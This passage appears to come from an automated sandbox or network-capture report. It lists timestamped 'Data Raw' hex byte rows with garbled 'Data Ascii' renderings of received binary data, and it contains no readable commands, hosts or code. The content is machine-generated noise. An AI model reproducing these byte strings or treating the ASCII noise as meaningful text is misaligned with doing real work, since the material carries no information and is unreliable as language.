f0 6e 1f 21 70 6b ae dc cf 9c 58 1f 4a fd 3b d0 f4 68 17 16 4c 48 23 c7 95 4a ae 5b c8 17 b1 20
                                        Data Ascii: )if39t#1q1wkg:~T:=SR2$GI$pE5xIQNKPTAoVkH?N`JSegiC, %WIO&F>]Lpv)O{F'L,ZEHGFX="x-QKwan!pkXJ;hLH#J[
                                        2021-09-10 09:33:46 UTC37INData Raw: 1e d6 23 69 2b 40 f3 d2 b8 d5 35 d9 4b 20 12 05 ad b5 3d 9e 3b 2f fe 33 85 41 2e 6c f7 b5 ad ea 2a 2a f1 a1 f4 0f ea fe 87 eb 5f 4b 61 7a 8f 07 2a 32 fe a2 d5 b5 cc cc 42 65 86 db 1a 1c e9 61 85 11 51 88 58 9b 15 16 66 63 65 9e 41 cf 3c 31 25 0a 5c b7 96 a5 20 24 5c e7 e7 5a f2 a0 36 8f 4f 9a 12 b0 95 00 b0 a2 28 f4 0f 6a 8d cf 9d 61 df eb 1f ab 3a 67 a6 b0 61 79 35 1c 75 cd ca 30 e0 e0 44 d2 20 99 b2 73 19 62 87 b4 a8 41 0a af 6c ec 17 f6 a9 fc 75 5d 37 8a 58 51 48 05 d3 e1 7d 4f ef 95 c0 6a 43 a9 94 82 00 05 81 0e d4 27 d5 cd b7 f4 8f be 96 f5 f6 26 b1 af 36 3c 19 63 2b fc 0f 18 0c d9 99 dd d1 f5 4c 88 c1 78 42 a0 55 ff 00 86 c7 06 53 bf 73 5c c8 68 58 3d 37 2a 72 95 2c a8 50 d2 ed ae 8d 56 f7 bc 75 52 e5 cb c2 4a 99 ed 4d 0b f2 f2 82 ed 63 59 c3 77 92
                                        Data Ascii: #i+@5K =;/3A.l**_Kaz*2BeaQXfceA<1%\ $\Z6O(ja:gay5u0D sbAlu]7XQH}OjC'&6<c+LxBUSs\hX=7*r,PVuRJMcYw
                                        2021-09-10 09:33:46 UTC39INData Raw: a5 fc 40 b2 54 94 b8 34 27 b7 b0 f8 80 a4 2d 8d a9 4d 8a cc 64 c7 c9 46 fb 7c 94 92 35 40 56 59 25 8d 24 5f fa e1 b5 8e 87 35 e0 71 d1 56 4e 17 50 77 b6 5d f3 e5 d1 54 61 42 8a 19 d2 a3 e1 d8 8a 13 7d e8 7d 22 48 e5 48 b9 78 f9 1d c9 0c 43 27 12 75 03 73 73 97 fa 2e 0d 0b 05 5c 7c 55 73 c0 b1 d7 25 aa 59 49 01 2c 75 06 b9 8b 16 a7 cc 79 69 50 38 83 35 9b 63 7e f6 e9 0c 9c 5c c7 c3 c9 c7 ec 48 e9 1a 65 bf 6c b5 6d fb 7c 85 1b ad 47 36 1b 70 36 4f 8b 3f 1d 0d 78 ac ec 08 a8 a5 76 e5 ae b0 4c 60 61 0d 84 93 c8 be 5c f9 fc c5 85 fa 5f ae 2c f3 65 69 59 51 ee 04 49 03 47 b8 c7 14 8b 36 d1 1c c5 cd 31 68 9b de a2 bc f8 3e 3a f4 b7 72 1f 27 1b 1b 77 cd b2 85 26 a0 a8 e2 50 71 5a 35 3b 7e 7d 22 f8 7d 30 f5 06 3e 26 0b e1 fe ac f3 63 42 b0 e4 34 de f2 64 89 f6 ee
                                        Data Ascii: @T4'-MdF|5@VY%$_5qVNPw]TaB}}"HHxC'uss.\|Us%YI,uyiP85c~\Helm|G6p6O?xvL`a\_,eiYQIG61h>:r'w&PqZ5;~}"}0>&cB4d
                                        2021-09-10 09:33:46 UTC40INData Raw: a5 b5 61 5b c5 a4 bc 25 2c 54 41 2e df 01 b9 d7 d6 18 43 d7 f8 7a 27 dd c6 ce b1 40 ec 21 02 49 14 45 59 1b 42 db 35 6d de ae 76 dd 1d fe 2a ba 51 69 53 94 91 b3 8d f7 b7 a6 9a b4 58 cb 57 db 97 5f 11 a5 49 ad 41 b0 0c 34 f9 30 09 9d fd 44 7a 7f d2 da 8e 3e 87 93 9f 1a 3a e3 c8 d8 4f 3c dd a1 52 12 b1 c0 ee cc 29 e2 c8 e1 18 5a 85 91 18 1a 6a 30 32 15 3c 84 cb 49 2f e7 76 a6 b6 f3 d0 3c 4c f1 89 4b ae 6a d2 92 2a 00 50 67 a5 df bd 0c 24 7e a8 ff 00 5c 1e 9f c4 f4 ab 27 f8 ac 30 6a ba 7b c9 11 08 ed 24 e5 77 32 4e 90 c3 13 33 ca d8 d2 ad 4d 10 16 51 ac 02 48 1d 58 70 1f 44 e3 27 4d c2 99 65 89 f0 9a bb 6e 05 28 6b d2 29 fe a1 fe a4 e1 38 54 87 98 09 17 18 9d b3 d0 e6 ed f3 15 83 27 ff 00 6a 5b e2 e9 59 da 37 da e7 4f 3b 42 62 8b 22 20 c9 04 d0 04 3d a5 25
                                        Data Ascii: a[%,TA.Cz'@!IEYB5mv*QiSXW_IA40Dz>:O<R)Zj02<I/v<LKj*Pg$~\'0j{$w2N3MQHXpD'Men(k)8T'j[Y7O;Bb" =%
                                        2021-09-10 09:33:46 UTC41INData Raw: 8a 8a ee d6 a3 d5 b9 12 3a 67 e5 95 60 f5 d6 9b 91 99 98 9f 66 8d 34 98 12 38 8d d5 54 76 a3 c8 85 a1 c8 db 26 d6 12 49 20 2b b5 ae fb 28 57 cb 74 d4 89 a9 25 9e 81 c0 dc d6 97 f2 8e 2e 52 8a 42 88 04 ef a8 ea fa f2 3e 70 84 d7 3d 0f 97 a8 f6 cb 33 62 45 0e 53 34 c2 ca 3e e5 56 64 62 2c 1a 90 1b 60 37 2b 1a b3 7c 74 e2 54 93 4a ed d9 bd f6 b1 d2 02 bc bc e8 6b 4e 99 5f ce 04 72 7e 9e fa 75 0c 32 65 e2 c5 9b 2a 20 57 ee fb 90 d0 3b 49 05 88 24 b7 34 41 22 f8 af 83 30 a1 24 84 80 03 0a 3e 75 be b9 01 f3 0a 2b f9 2a 99 9a 6d 13 f8 1a 7e 16 99 8a 82 28 a3 c5 8c 01 ba 38 23 45 25 81 f6 01 c7 80 9c 13 e7 f1 d7 66 2c 2c 06 52 a9 46 7d cf 2c a9 e9 ac 78 84 84 38 03 1e 26 e4 29 db fa 5a 05 7d 5d f5 13 40 f4 8e 9f 95 a8 6a 5a 86 2e 14 18 d1 cb 24 f2 49 3c 68 fd b4
                                        Data Ascii: :g`f48Tv&I +(Wt%.RB>p=3bES4>Vdb,`7+|tTJkN_r~u2e* W;I$4A"0$>u+*m~(8#E%f,,RF},x8&)Z}]@jZ.$I<h
                                        2021-09-10 09:33:46 UTC42INData Raw: 0a fe 05 74 cc 90 a7 4a 6f a8 fc 6f ae b5 8a b9 cd 55 12 c4 ba 70 e5 e5 7e 64 e6 63 93 df d4 5e 64 72 6b 52 a9 9b 6e e5 46 51 c1 12 1d 83 79 f3 57 ee e5 6b fb 7f 3b 7f a5 4b 4e 00 c5 e8 09 f5 24 5b 22 1b 93 e7 1f 3d fa dc d2 89 c4 0a bd 18 ee 6e 2a 33 2d ef 68 0a f4 f2 41 17 a7 fd 50 d3 76 c4 03 4c d0 74 f6 09 4a fb 32 f5 0e e4 b1 70 3d aa c8 bc 8f 3c 9b be 9a 41 51 e2 81 56 4a 6c ed 51 ae 77 fc c5 47 84 48 29 06 e0 9f 4b 0a 65 5c bc a0 8b e9 5e 30 9b 4a ca f7 01 b7 5c 99 f1 d2 30 c5 c4 4e 88 46 e2 28 7b 54 8a be 38 e7 c1 ba ff 00 ab 4c 22 66 1a 1b b7 e7 2b 7e b5 82 fd 3c 15 5e 82 dc d8 da bc fb 30 f5 81 31 a6 8a 28 25 92 68 0e 4a e4 60 34 8c 8b 22 99 5a f2 71 9d 53 ce f8 5d 08 22 ec ee b1 43 8e aa 25 2b c6 45 19 45 aa 2d 5b 53 2b e4 5e 2c a7 06 41 21 c9
                                        Data Ascii: tJooUp~dc^drkRnFQyWk;KN$["=n*3-hAPvLtJ2p=<AQVJlQwGH)Ke\^0J\0NF({T8L"f+~<^01(%hJ`4"ZqS]"C%+EE-[S+^,A!
                                        2021-09-10 09:33:46 UTC44INData Raw: 92 db ea 3c 93 cf a0 69 5a 34 4b b0 66 49 36 74 ac c5 83 08 f0 63 66 8e 30 41 03 99 9d 19 ae bf 60 bb ae b8 95 04 b9 6a b5 f4 20 75 cc bf 2e 91 02 71 2e 8f 71 ff 00 f2 9b 64 d6 ad 28 23 9c 3f 58 b5 8c 4c cc 5d 0f 0a 74 dd 97 87 1e 5e 14 93 1f 70 79 1b 78 70 41 16 2c d1 22 c8 35 c7 15 d2 25 8d 71 d7 91 1c e2 c2 5a 9c e6 06 99 1e 5c b5 e9 14 b7 d5 ef 2c 52 e6 63 e3 17 9a 18 71 62 56 00 0a 8e 54 85 d0 8f c9 5a 22 85 71 76 7c d7 44 42 b1 03 95 c5 41 63 6e 7c ea fe 75 83 10 10 41 48 2e 40 24 dd 9d bd 33 af f4 23 85 8e a3 17 11 56 31 26 4b ca 1b 22 71 ee 08 ab 8f 23 b4 66 35 1f b5 42 ad b0 f0 6b f1 d0 55 72 fd fe b4 86 d1 89 3e 22 71 24 e4 28 6f ce a4 f7 ac 46 66 43 10 4c af b9 94 63 e3 cf 8d 1b f7 99 37 14 8d ec 7b 4f ee 3c 91 c1 20 d0 35 c0 ea 48 77 a7 96 bd
                                        Data Ascii: <iZ4KfI6tcf0A`j u.q.qd(#?XL]t^pyxpA,"5%qZ\,RcqbVTZ"qv|DBAcn|uAH.@$3#V1&K"q#f5BkUr>"q$(oFfCLc7{O< 5Hw
                                        2021-09-10 09:33:46 UTC44INData Raw: 1a 8f 90 2a ba 12 d2 a4 53 3d 46 44 8f 83 e9 58 b1 97 3d 18 49 29 20 b1 ad 1c 1c 8f 5e 43 90 8a e5 f5 47 eb 36 1e 1e 9f 9b 89 90 f9 58 99 4f 8c c9 26 3c f6 9d e5 8d f7 63 ca 84 80 19 a1 73 b4 ae e5 3d b0 09 ae 8f c3 70 9f 72 72 50 b2 08 50 77 d1 f6 a7 5f 2c e1 4e 3b ea 5f 66 5b e2 62 06 5a b6 af 53 af 31 48 e6 a7 ac 7e ab fa 87 d6 5a 82 c7 93 99 da c4 d3 23 91 60 79 d9 a3 c8 c9 55 20 c7 0c 79 22 42 c5 4b 20 2a 59 b7 10 16 cf c7 5b 5e 0b e8 fc 34 96 74 82 5c 65 f9 d3 31 d6 3e 7f c7 7f a8 78 89 8e cb 52 30 b8 a9 b8 f9 6e f3 22 ba fa 9b d6 12 e4 64 6c 83 26 49 33 c4 ac b3 47 3f eb 92 c0 32 b4 8a ea ad b4 ab 10 5d b9 67 03 9e 6c f5 7d 29 12 b8 60 0a 10 02 85 01 61 41 95 ff 00 1c b4 8c 8f 17 c5 ce e3 16 01 52 aa ac dc 5f 97 cd 35 ac 4e 7a 07 e9 47 d4 ef a9 f9
                                        Data Ascii: *S=FDX=I) ^CG6XO&<cs=prrPPw_,N;_f[bZS1H~Z#`yU y"BK *Y[^4t\e1>xR0n"dl&I3G?2]gl})`aAR_5NzG
                                        2021-09-10 09:33:46 UTC93INData Raw: 40 e7 34 47 7b 4e c1 48 f6 b1 57 1b 36 8a 31 1e 39 dc 36 80 08 bb 62 07 4a 97 b1 cb 28 3a 52 5e b6 19 1b 1e 50 bb d5 0c 84 cc a6 6d d0 ce ed 3c 72 95 02 bc 95 42 c4 d0 2c 3c 8a ff 00 b7 9e a4 87 0e 03 74 ef f0 1e 38 bc 26 98 43 8d 45 b3 ef da 15 da 94 84 ef 62 c2 46 21 a9 fc 6f d8 a7 86 af e2 c0 51 5b 88 e4 d1 ea 4b a2 69 4a 8d 87 c7 37 db 5a 42 cb 48 00 02 c6 ec 76 f2 a7 9e 7e 55 df ea 13 40 34 f9 dd 51 da 08 a6 8c 3a 23 52 99 d4 35 6d 0c 2c b0 06 f8 6b ab af 07 a7 b8 47 52 a5 87 37 60 e5 da 9d 62 87 8c ff 00 21 90 c4 c3 2b 65 5d c9 8e 5d 7f 53 d2 98 7d 07 9f 34 80 48 cd a9 48 c1 64 f6 c7 1a cb be 08 c0 a3 64 96 75 2b c9 24 82 39 f1 d6 bf e9 28 3f ee 33 62 a1 41 a3 d0 fc 01 af 28 f9 d7 fa 8e 60 1c 3c f7 ff 00 a9 a9 ad 41 0c d6 d1 8f f6 dc 53 f5 9c 1d dd
                                        Data Ascii: @4G{NHW6196bJ(:R^Pm<rB,<t8&CEbF!oQ[KiJ7ZBHv~U@4Q:#R5m,kGR7`b!+e]]S}4HHddu+$9(?3bA(`<AS
                                        2021-09-10 09:33:46 UTC94INData Raw: d1 10 08 aa aa 0b 1a 5f 7f 8f cc 2e 52 18 e2 1e 2f 11 bb 6b 97 6d 18 61 2e b2 b3 cb 4a 03 10 89 f0 cb f8 26 bc f1 c0 f6 f4 45 10 4b 8c ff 00 af 88 e4 a5 2c 5b 53 56 f4 bb 59 a9 5e b1 f7 29 a2 40 d9 4f 68 12 2b 23 77 00 f8 1b 79 f2 7f f5 f3 d2 cb 3e 36 26 c2 83 c8 fb 8a 69 58 2b 82 f4 25 44 e4 69 5d b3 ad b9 73 80 3d 52 53 ab 66 61 98 e3 63 89 0b 96 99 de c0 7a 4b 0a a7 81 ed 24 9b 1c 1a 15 d0 97 6e bf 06 0b 2d 2a 49 c5 4a 86 eb 7a 9b 7a d1 b4 8a c7 f5 8f 52 4c 6f 47 ea b8 21 81 4c 9c b9 e0 8b 77 20 3a ca c6 5b 1f e6 e3 81 c0 b3 5c 5f 4b cc 4a 48 ad ce 5d db bd dd c9 04 e1 23 2e fe 47 a7 38 e5 b6 b9 31 9b 51 d4 a3 57 a8 a1 88 aa ef dc 17 79 7f 71 16 76 f0 00 fe c7 a0 e1 01 db 3d cf a5 cf 74 10 e2 09 09 1b d0 8b e7 01 92 05 86 6c 52 e5 5d a3 82 49 05 fc 30
                                        Data Ascii: _.R/kma.J&EK,[SVY^)@Oh+#wy>6&iX+%Di]s=RSfaczK$n-*IJzzRLoG!Lw :[\_KJH]#.G81QWyqv=tlR]I0
                                        2021-09-10 09:33:46 UTC95INData Raw: ca 76 b0 7e 08 03 6d ef 55 b2 39 a2 c0 0b a1 d7 42 c6 77 f7 1d fe a1 29 a5 4c 49 b3 1b 0a 9a 73 71 ef 4c e0 3f 58 d3 a5 0b 27 69 54 ac 9b ed a3 91 23 2b 64 09 00 04 1b 61 c9 57 6b f8 5e a7 a7 e7 b7 ee 9a 04 4f 49 1e 2c 45 54 00 9a fb 79 36 50 88 f5 9e 24 58 f8 45 60 6b 40 b3 86 90 2e d7 ef 48 ac 63 72 00 36 e1 ff 00 e6 a9 e1 89 2e b5 75 d7 bb 1d 8f 2f ce 6a 4c 23 c5 7b 68 5f bb 76 5a 28 ef ad 75 4c 8d 38 49 87 39 51 95 1b 49 2f ed b4 9d a4 2c e2 44 71 41 6c 5e e0 dc 03 fd fa b0 e0 c0 5b e3 16 29 a8 a0 0c 32 19 f9 3e ae 2d 9e e3 66 a8 a9 94 28 02 98 8d 3e 5b 9c 28 b4 2c 8c 8c cc 89 32 de 19 c8 57 68 d9 22 a7 65 40 6d 64 26 41 4c 43 0e 08 26 b9 db 55 d5 f2 0a 68 12 2c 28 69 ca ef 14 0a 1e 35 17 d6 9d 61 a7 e9 f5 77 3d f8 dd c4 4c f2 15 45 0b ec 75 93 6b b2
                                        Data Ascii: v~mU9Bw)LIsqL?X'iT#+daWk^OI,ETy6P$XE`k@.Hcr6.u/jL#{h_vZ(uL8I9QI/,DqAl^[)2>-f(>[(,2Wh"e@md&ALC&Uh,(i5aw=LEuk
                                        2021-09-10 09:33:46 UTC96INData Raw: 11 46 0c f1 64 12 a7 73 6d a6 22 ac 28 37 5e 47 49 cd 94 92 97 c4 c4 b5 ed d0 3b 3f 9f b0 8b b9 53 57 84 02 9c 44 e4 cc 4b 1c f4 0f e7 58 5e 6a 78 d2 36 f7 dc 7b ce 4c 92 28 3b 98 a1 e1 77 29 e6 81 2a 41 aa 00 93 e7 aa ce 26 5a 81 18 66 a5 89 62 96 0f fa d3 dc 18 b3 e1 54 a5 38 54 b2 18 53 50 db f4 7c b3 80 dc a6 96 23 2c 53 a4 7b 51 95 48 f2 0a 3a 6d 0e a4 f0 2c 9a a0 78 e4 f9 ae 97 52 51 87 09 d2 8c 58 9e da 9d 77 77 d0 01 2e 9a 38 b9 d9 af d4 0b 7a e6 27 92 a0 46 16 18 fb 81 98 c5 24 6c e1 b6 98 cd ef 5b 1f e5 17 fe a3 fd 7a 50 dc b5 b2 83 c2 e7 5c 78 e1 12 42 23 68 f7 6f a6 0c 64 b5 56 fd ea bc 95 00 5d 81 cf 37 e0 74 44 a4 10 ee 5c ef d2 06 ba a8 93 73 c8 39 67 3e e3 d7 68 51 ea 84 77 66 88 b0 25 a3 32 0b 6d aa 80 29 a2 fb 79 6b 04 5e ce 0d 1e 7e 7a
                                        Data Ascii: Fdsm"(7^GI;?SWDKX^jx6{L(;w)*A&ZfbT8TSP|#,S{QH:m,xRQXww.8z'F$l[zP\xB#hodV]7tD\s9g>hQwf%2m)yk^~z
                                        2021-09-10 09:33:46 UTC98INData Raw: c1 1d 70 09 80 30 a7 91 f9 f9 8e 94 83 71 ea 63 fa 37 42 77 04 bd aa 48 e4 1f 1b 97 77 06 85 73 5f ef fd ba d3 23 f9 0a bd ed c8 f3 8c 19 9a 40 70 9a 8d ff 00 51 95 98 ed dd be c2 95 b1 cf b8 1f c5 5f cd 78 e0 d8 e7 9a e8 aa 0e c7 fe ae 79 c7 90 4d 54 d6 49 24 75 cc df e6 3f 40 8e d2 f7 37 28 b6 06 bc 2e d3 c7 02 f8 3f 9f e7 c0 eb c9 38 83 b0 1e ba 66 c3 db 4d 23 a2 67 fe b9 6a 74 e5 d7 4e 91 35 1c a5 57 dc 96 c7 da 0f 36 07 9b ae 6f f8 23 e2 bf d3 a9 0c 4b 92 a7 2e c7 2d a9 02 23 ee 95 17 c3 85 e8 ce ed d4 77 a4 7a 60 d2 15 50 2f c9 1c f0 6f 81 63 e0 7c 9b 3f 1c f5 35 65 46 a7 c9 fe fa c7 91 72 15 60 d5 19 d0 5f e5 9e 91 0f a8 b9 c8 49 20 56 51 12 b6 d6 ab f7 39 ad c9 63 e0 d1 a3 c0 15 d2 93 47 8b 16 8d 4f 28 20 9a 92 e0 00 5a 97 88 ec c5 45 c3 8a 38 e9
                                        Data Ascii: p0qc7BwHws_#@pQ_xyMTI$u?@7(.?8fM#gjtN5W6o#K.-#wz`P/oc|?5eFr`_I VQ9cGO( ZE8
                                        2021-09-10 09:33:46 UTC99INData Raw: 63 20 6d 61 cd f9 be 83 30 21 40 24 cc 63 71 40 4d f6 3e 8c 6e d0 e4 8f ba 80 71 4b 7b 97 a8 03 2a 33 39 06 d6 f3 82 9d 06 7c 98 a5 94 34 9f 70 ae c1 62 8d cc 71 85 45 45 42 a8 47 b5 85 02 41 35 f3 67 a2 01 84 21 2c ed 99 19 73 b3 8e f2 85 a7 f8 b1 39 09 ab d6 c1 c5 bd 62 7b 23 37 11 27 89 e4 a5 93 ff 00 86 01 b7 57 3c 16 da 01 03 9f 68 b3 64 7b 88 ae 87 88 99 89 05 2e 01 35 cc b5 47 b7 bb 08 12 10 a1 2c 84 9d 3c 54 73 5d 01 6a f3 de 91 ed 32 d9 d6 4e d6 d8 94 39 55 12 c6 1a c5 d3 30 7b e0 31 fd b7 76 2f 9a f2 55 f8 87 fd 5b 21 9b 6b df 47 85 94 a5 12 52 a7 24 58 59 cd bf 11 f9 65 73 24 72 b1 0c f1 36 e0 61 60 4a f9 1d be cb 50 fd c0 d9 5f 77 fd 35 d0 08 f0 b8 53 1d 1b 36 72 33 e4 f4 e7 11 9b 34 94 7d b2 9c 0e 2e 4f 6e ef eb 61 03 ba a3 c7 90 b2 b3 64 2a
                                        Data Ascii: c ma0!@$cq@M>nqK{*39|4pbqEEBGA5g!,s9b{#7'W<hd{.5G,<Ts]j2N9U0{1v/U[!kGR$XYes$r6a`JP_w5S6r34}.Onad*
                                        2021-09-10 09:33:46 UTC100INData Raw: 3e da 42 ef 47 d8 7e a9 58 64 2c 84 85 29 90 a2 ef 9f 46 a7 99 a7 94 63 c5 9a 6c 89 5c e5 05 06 48 d5 02 88 f7 c4 ac 28 85 06 c5 90 39 b1 44 ee 17 57 5d 72 52 14 a9 95 14 26 80 7c ed bf bc 06 62 d0 89 67 c4 c3 56 ce fd 1c f6 f5 89 49 e3 ed 46 69 23 66 48 e1 32 a4 92 84 2a 93 10 a1 16 02 41 91 6b de 42 ee a7 1c d0 3d 3f 32 4a 80 2a 49 21 39 0a 5a c5 8d 0f e2 d0 ac ae 21 25 40 e3 24 a8 ef f2 3d 4e 47 78 85 97 36 48 e3 9e 18 b7 47 91 0b 87 70 5d d9 65 8f 71 11 ee 83 85 8d 92 22 52 ff 00 cc a4 11 ee 17 d2 62 63 a1 52 c0 75 62 24 07 ca d6 e7 e5 ce 2c b0 25 53 10 bc 59 0a 1f 62 dc fe 2b 9a cb d4 cd 2a be 6f 6d a3 94 84 53 1a 4e 80 18 3b 81 59 a3 32 2b 37 7a d8 dc 4c eb c0 25 49 07 aa 89 df e5 e2 65 02 49 4b 58 12 d4 3c cd 4e 54 d8 46 a3 81 0a 02 58 48 a5 89 0f
                                        Data Ascii: >BG~Xd,)Fcl\H(9DW]rR&|bgVIFi#fH2*AkB=?2J*I!9Z!%@$=NGx6HGp]eq"RbcRub$,%SYb+*omSN;Y2+7zL%IeIKX<NTFXH
                                        2021-09-10 09:33:46 UTC101INData Raw: 59 52 61 65 6b 98 fa 4c 59 27 ed 26 c3 75 99 92 30 44 91 e4 ca f9 78 73 94 70 18 95 79 05 91 44 6c a2 02 b1 00 f3 52 52 82 6f d3 fb e5 41 43 15 7c 39 51 5b 3b 9a 90 18 97 6a ea 7e 32 88 39 64 c9 c0 68 0a 83 23 e3 e4 4f 8f db 60 50 3c 0c 40 74 6f 6f cb 0b 89 9b ca 92 a3 8e 7a e8 48 28 07 0b 9e 9d 58 7e 39 da 27 31 53 25 ad d5 40 48 0c 77 cd f5 77 89 0c a8 76 98 e0 da d1 ae 66 d7 fc 76 1d ff 00 e4 cd 18 e0 af 69 ff 00 d3 6d df f1 0c b0 bb 9a 83 7c fc f9 56 3c 3f f2 38 27 57 1e a1 fa b7 93 41 a6 9d 1c 5a 9e 9c 74 ac 89 63 94 77 02 62 97 66 2d 0e 7a 21 12 44 d7 b5 06 3e 6a 8d 80 1a 0a e1 4a d9 34 11 58 5c a5 9f fa 92 ed 97 7f d6 91 67 20 fd d0 65 a9 56 34 a5 73 b5 5b 97 c5 1f 1e 04 27 4e d2 1b 47 c9 c7 96 0c 9d 3e 47 98 63 be d6 7e d8 c9 44 55 50 3f 6e d0 cd
                                        Data Ascii: YRaekLY'&u0DxspyDlRRoAC|9Q[;j~29dh#O`P<@toozH(X~9'1S%@Hwwvfvim|V<?8'WAZtcwbf-z!D>jJ4X\g eV4s['NG>Gc~DUP?n
                                        2021-09-10 09:33:46 UTC103INData Raw: ba 21 92 ab fc df cf 46 c6 92 68 ee 48 6b 00 35 cf 5b 6d 11 12 92 e4 90 1f 5d a9 df ad eb 1a bf 54 a0 33 65 69 ba 9b ec ec f6 64 79 a4 1b 79 4c a4 a9 09 0b c5 ac d1 ed 2b b4 15 3e 6a f8 7f 82 99 87 ee 24 bf 88 96 02 a6 ed 4b d3 42 f9 6c f1 5b f5 07 0a 49 23 30 01 1a 1a 01 b7 79 45 a7 fe 96 b5 c7 3e 9a 8f 14 fb a4 c2 cc 65 50 94 de d7 bb 34 6b 6b d8 06 cd 70 28 13 c7 59 5f f5 24 9c 33 71 a5 25 94 90 41 e4 59 89 a9 fe a9 1b 1f f4 8c e6 46 17 66 52 9c 9b fe bd 4e 71 d2 9f 49 eb f1 a4 4b 34 c0 bc 52 04 86 58 98 03 4d da 05 de 44 20 5f 14 ab 63 e3 e4 75 8c 9b 2d 80 16 55 4b f3 1f 14 fd 47 d7 be 9b 3c a9 29 c4 a7 d8 b5 6b bd 9d b4 b5 9a d1 60 fd 2e c8 25 c6 78 a2 56 89 55 a4 04 37 ba a4 5b f7 c5 54 cd 43 8e 08 06 85 8e 7a 48 a0 80 49 a9 bd 34 f9 3d ed 1a 74 4c
                                        Data Ascii: !FhHk5[m]T3eidyyL+>j$KBl[I#0yE>eP4kkp(Y_$3q%AYFfRNqIK4RXMD _cu-UKG<)k`.%xVU7[TCzHI4=tL
                                        2021-09-10 09:33:46 UTC104INData Raw: db 20 28 b1 35 15 cf a8 2f e6 47 95 da 05 75 fc 2f 7c 99 2a 3f e1 e5 01 9e 56 91 99 bd a0 d2 c7 7b 77 10 cb 64 01 f2 7c 9e 83 f6 c2 c0 5a ea df c4 00 f6 eb d1 9d e1 a0 52 40 15 f0 e4 1b 3f e9 f9 56 d5 85 57 a9 60 9d e2 cc a7 ee 23 c4 24 5f 1b e3 05 29 64 5e 78 b2 2f 68 fc 59 ae 99 03 12 53 86 ce 28 69 fa ac 4b c2 1d 81 2e 0d 36 76 e7 4e b0 a5 8f 15 f1 75 4c 44 0b 1b 2a 4b 1c 72 c8 c0 06 91 b2 55 ce ea ff 00 c0 40 b6 e3 9f 8e 8c 83 46 cc bb 69 68 56 68 a1 2c f9 be 6f 61 df 3b b5 0a f1 b1 b7 ca 23 8a 16 21 77 21 95 c7 b4 06 2e 77 8b 5b 60 cd e3 9a ff 00 b5 47 ee 1c 45 39 d7 2f 9e ff 00 25 97 2d 78 01 35 61 99 a8 cb 96 c2 ba da b1 bb 8a d1 e9 39 11 4d 3e e9 4b 4e 51 d7 f5 15 49 24 00 cc 14 f8 1e d5 51 44 73 c8 3e 7a 10 01 4a 77 a5 1e ef ed d7 3b 47 27 48 c4
                                        Data Ascii: (5/Gu/|*?V{wd|ZR@?VW`#$_)d^x/hYS(iK.6vNuLD*KrU@FihVh,oa;#!w!.w[`GE9/%-x5a9M>KNQI$QDs>zJw;G'H
                                        2021-09-10 09:33:46 UTC105INData Raw: 12 01 a5 5e 99 1e 54 7e ad 1f 19 98 13 8a 76 37 aa d4 cd ce 8f 4a e5 6a 7b 42 cf d5 d8 8e b2 ea 3b 54 56 9f 85 0a a4 ca 76 95 8f 1b 86 75 1b 85 13 b9 f7 7c b1 0a 48 1d 5b 48 29 99 28 38 f0 86 35 6a 5d d8 97 a1 eb d6 f1 43 38 09 7c 45 49 bb 38 d7 cf cf 9b 5c 45 e4 fa 0d ea ff 00 b9 f4 bc 31 66 17 c9 9d b1 60 c2 27 b8 8c 11 55 0a e2 ce cb 25 01 de 8c 24 67 e5 58 75 89 fa c7 0e b1 39 4a 42 0b 63 2a 06 b6 7a 52 96 ae 47 36 ac 6f 3e 8b c4 20 c8 28 5a 9c 94 b5 1a bc c6 6d 5b e5 10 1e b3 c0 8f 42 f5 14 b9 5d e0 b8 f9 98 8b 93 01 8b 97 c6 d4 22 95 16 44 dc 08 52 b2 0d a4 d8 f1 f8 e2 c5 22 61 5c b0 8c 2a 0a 4d dc 30 cf 78 84 f9 48 97 34 a8 58 9e 5d d2 9f 11 0d af e5 e3 6f df 8e f2 49 79 65 90 4b 1e c0 d0 ea 58 cb 33 07 3c d0 19 0b 20 e0 d5 a8 af c0 3c b2 ea c3 50
                                        Data Ascii: ^T~v7Jj{B;TVvu|H[H)(85j]C8|EI8\E1f`'U%$gXu9JBc*zRG6o> (Zm[B]"DR"a\*M0xH4X]oIyeKX3< <P
                                        2021-09-10 09:33:46 UTC106INData Raw: fd bb 5f 2c a1 19 85 46 78 a5 1d f9 8a b6 86 9f bd 21 83 3a 43 85 a4 ac d1 7f f8 b7 58 62 f7 12 91 ed 92 30 cf b4 21 b3 b9 59 94 fc 6e e7 a4 d3 45 a9 2f e2 39 38 7c f7 b5 61 e5 02 50 95 b1 c2 12 1c e4 0e 8f 9d f9 e5 06 ff 00 4a f0 96 38 b5 e7 c9 41 2a 04 79 21 5b fd aa e8 c1 63 0a 6f 75 11 63 cf f6 3f 00 e2 8b a4 01 53 8b 2b fc f5 f7 a8 76 38 70 ac 81 70 f9 5d eb b7 79 bd e5 f1 71 a2 8a 75 ce 89 92 45 33 41 a6 6a 30 9b 0d 0c 13 c8 dd 9d a4 91 61 40 04 2d 56 d0 4f 04 73 e1 44 82 69 40 f4 6f cc 15 ea 75 b9 eb fd 40 fe a9 89 91 89 84 d9 78 6d ee c3 2b 7b 89 01 93 be c8 1c 0f fc 29 7c 78 35 d7 99 2a 15 53 0b 82 5a ed 6f ee b1 12 40 29 19 bf eb e5 ba c0 fc f8 c3 23 40 c9 cb ee 26 ff 00 f8 90 ea 8a a1 55 83 89 eb b7 47 dc c8 ce 49 22 8d 8e b8 95 11 31 08 48 70
                                        Data Ascii: _,Fx!:CXb0!YnE/98|aPJ8A*y![couc?S+v8pp]yquE3Aj0a@-VOsDi@ou@xm+{)|x5*SZo@)#@&UGI"1Hp
                                        2021-09-10 09:33:46 UTC108INData Raw: 15 40 18 ab 79 6b 25 81 73 fb 89 00 0a eb 37 c4 4c 23 16 65 d8 6b 7b 59 86 5e 51 b4 fa 5a 41 52 d5 7b 33 0a 13 e5 a3 db 20 6b 94 5c df a6 68 34 f8 7f 5b 19 19 a7 c8 86 18 e5 2a d2 3e 34 2c c1 1c d5 13 db da cd ee a3 5b 89 eb d2 8b b0 5d 1d af bd df ce a2 be 91 6f 3a 50 5c b5 29 26 a9 49 55 ea 30 82 6b 51 7b 73 3a 52 2e 66 8f e9 f8 a4 ce d3 22 8d d6 55 c9 c7 c6 7e cc 7f a2 44 50 52 18 e3 69 02 b2 f6 d5 77 8e e2 2f 70 29 20 f3 d5 ac 9e 05 0a 9a 06 27 4e b9 56 83 4d de 8c 3c 9f 1d 3f 8d 9b 2a 5c d5 b2 92 e0 80 75 ea 7b cd cd 89 96 bf e9 4c 28 97 1f 0f 1d c3 4e 76 e7 b6 4c 52 07 